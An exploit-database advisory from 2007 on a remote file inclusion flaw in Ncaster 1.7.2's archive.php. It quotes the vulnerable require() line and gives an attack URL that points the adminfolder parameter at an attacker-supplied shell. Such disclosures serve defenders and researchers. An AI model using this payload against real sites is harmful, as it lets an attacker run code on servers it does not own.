Ncaster 1.7.2 - 'archive.php' Remote File Inclusion

EDB-ID:

4273


Author:

k1n9k0ng

Type:

webapps


Platform:

PHP

Date:

2007-08-09


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : Ncaster 1.7.2
Discovered By   : k1n9k0ng
Scripts site    : http://ncastercms.com/downloads/ncaster172.zip
Thanks To       : #sekuritionline, #semprol, #mimid, #r.i.p, #x-code, #yogyafree
special To      : adhietslank, babypunk, bugs_, cyberlog, cah_gemblunkz
site            : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug Script:
require("$adminfolder/sources/datelib.php");

bug found:
"http://www.site.net/ncaster/admin/addons/archive/archive.php?adminfolder=[shell]"

# milw0rm.com [2007-08-09]